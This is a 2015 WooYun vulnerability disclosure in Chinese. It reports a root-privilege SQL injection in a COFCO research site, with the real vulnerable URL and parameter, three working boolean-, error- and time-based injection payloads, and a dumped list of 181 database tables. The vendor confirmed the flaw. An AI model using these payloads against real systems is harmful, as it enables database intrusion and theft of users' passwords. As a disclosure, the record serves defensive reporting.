当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131354

漏洞标题:中粮某站存在root权限SQL注入(可脱库)

相关厂商:中粮集团有限公司

漏洞作者: littelfire

提交时间:2015-08-03 17:28

修复时间:2015-09-17 18:52

公开时间:2015-09-17 18:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-03: 细节已通知厂商并且等待厂商处理中
2015-08-03: 厂商已经确认,细节仅向厂商公开
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

rt

详细说明:

中粮营养健康研究院存在root权限sql注入漏洞,可脱库获取大量用户和密码相关的敏感信息

漏洞证明:

注入地址:http://c3.cofco.com/online_check.php?uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988
注入点为:app

Parameter: app (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' AND 9435=9435 AND 'pqLB'='pqLB
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' OR (SELECT 3794 FROM(SELECT COUNT(*),CONCAT(0x716b766271,(SELECT (ELT(3794=3794,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'snyA'='snyA
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: uid=0&uname=135791&mod=Passport&act=login&action=trace&app=public9988' OR (SELECT * FROM (SELECT(SLEEP(5)))Xddd) AND 'WjQq'='WjQq


注入是root用户dba权限

3.jpg


跑出了用户的密码

2.jpg


跑了一下dbs

4.jpg


当前库为:project_cofco
库内有181个表

1.jpg


+------------------------------+
| qm_activity                  |
| qm_activity_category         |
| qm_activity_dimensions       |
| qm_activity_dimensions_score |
| qm_activity_expert_score     |
| qm_activity_user_link        |
| qm_activity_user_rater_link  |
| qm_app                       |
| qm_app_tag                   |
| qm_atme                      |
| qm_attach                    |
| qm_birthday_count            |
| qm_blog                      |
| qm_blog_category             |
| qm_blog_view_temp            |
| qm_blogger                   |
| qm_calendar                  |
| qm_calendar_big_event        |
| qm_calendar_big_event_url    |
| qm_calendar_collection       |
| qm_calendar_event            |
| qm_calendar_setcache         |
| qm_calendar_share            |
| qm_calendar_story            |
| qm_clean_cache               |
| qm_collection                |
| qm_comment                   |
| qm_contact_user              |
| qm_credit_node               |
| qm_credit_user               |
| qm_denounce                  |
| qm_department                |
| qm_device_token              |
| qm_expert_action             |
| qm_expert_action_dimensions  |
| qm_expert_action_rater_link  |
| qm_expert_action_user_link   |
| qm_expert_category           |
| qm_expert_category_link      |
| qm_expert_dimensions         |
| qm_expert_score              |
| qm_expression                |
| qm_feed                      |
| qm_feed_data                 |
| qm_feed_node                 |
| qm_feedback                  |
| qm_feedback_type             |
| qm_holidays                  |
| qm_interface_log             |
| qm_invite_code               |
| qm_invite_record             |
| qm_ioffice_leave             |
| qm_ioffice_leave_count       |
| qm_ioffice_leave_uid_link    |
| qm_ioffice_log               |
| qm_ioffice_user_days         |
| qm_ioffice_user_log          |
| qm_lang                      |
| qm_log_comment               |
| qm_login                     |
| qm_login_record              |
| qm_manage_user               |
| qm_medal                     |
| qm_message_content           |
| qm_message_list              |
| qm_message_member            |
| qm_navi                      |
| qm_news                      |
| qm_news_category             |
| qm_news_category_user_link   |
| qm_news_log                  |
| qm_notice_pushlist           |
| qm_notify_email              |
| qm_notify_email_list         |
| qm_notify_message            |
| qm_notify_node               |
| qm_oauth_token               |
| qm_online                    |
| qm_online_logs               |
| qm_online_logs_bak           |
| qm_online_stats              |
| qm_open_notify               |
| qm_open_weibo_login          |
| qm_permission_group          |
| qm_permission_node           |
| qm_portal_channel            |
| qm_portal_node               |
| qm_portal_page               |
| qm_present                   |
| qm_present_record            |
| qm_profile_bookmaking        |
| qm_profile_confraternity     |
| qm_profile_education         |
| qm_profile_profession        |
| qm_profile_work              |
| qm_province_city             |
| qm_recent_view               |
| qm_resource                  |
| qm_resource_attr             |
| qm_resource_member           |
| qm_resource_order            |
| qm_resource_order_user       |
| qm_resource_user_star        |
| qm_schedule                  |
| qm_search                    |
| qm_search_key                |
| qm_search_select             |
| qm_share_record              |
| qm_sina                      |
| qm_subject                   |
| qm_subject_part              |
| qm_subject_province          |
| qm_summary_info              |
| qm_system_data               |
| qm_tag                       |
| qm_task                      |
| qm_task_log                  |
| qm_team                      |
| qm_team_album                |
| qm_team_article              |
| qm_team_attach               |
| qm_team_category             |
| qm_team_category_link        |
| qm_team_count                |
| qm_team_feed                 |
| qm_team_file                 |
| qm_team_forum_post           |
| qm_team_forum_topic          |
| qm_team_log                  |
| qm_team_member               |
| qm_team_photo                |
| qm_team_plug                 |
| qm_team_plug_init            |
| qm_team_plug_mod             |
| qm_team_plug_mod_init        |
| qm_team_theme                |
| qm_team_topic                |
| qm_team_topic_link           |
| qm_team_visit                |
| qm_team_x_category           |
| qm_timeline                  |
| qm_tips                      |
| qm_topic                     |
| qm_topic_highlight           |
| qm_topic_link                |
| qm_url                       |
| qm_user                      |
| qm_user_app                  |
| qm_user_attention            |
| qm_user_blacklist            |
| qm_user_count                |
| qm_user_credit_history       |
| qm_user_data                 |
| qm_user_department           |
| qm_user_follow               |
| qm_user_follow_group         |
| qm_user_follow_group_link    |
| qm_user_group                |
| qm_user_group_link           |
| qm_user_medal                |
| qm_user_online               |
| qm_user_privacy              |
| qm_user_profile              |
| qm_user_profile_setting      |
| qm_user_special              |
| qm_user_verify               |
| qm_visit                     |
| qm_widget                    |
| qm_widget_diy                |
| qm_widget_user               |
| qm_wiki                      |
| qm_wiki_category             |
| qm_wiki_category_link        |
| qm_wiki_history              |
| qm_wx                        |
| qm_x_article                 |
| qm_x_logs                    |
| qm_x_logs_2013_10            |
| qm_x_vote                    |
| qm_x_vote_opt                |
| qm_x_vote_user               |
+------------------------------+


跑了一下qm_user表的数字做了一下验证

5.jpg


6.jpg

修复方案:

做好过滤。

版权声明:转载请注明来源 littelfire@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-03 18:51

厂商回复:

非常感谢您的支持!

最新状态:

暂无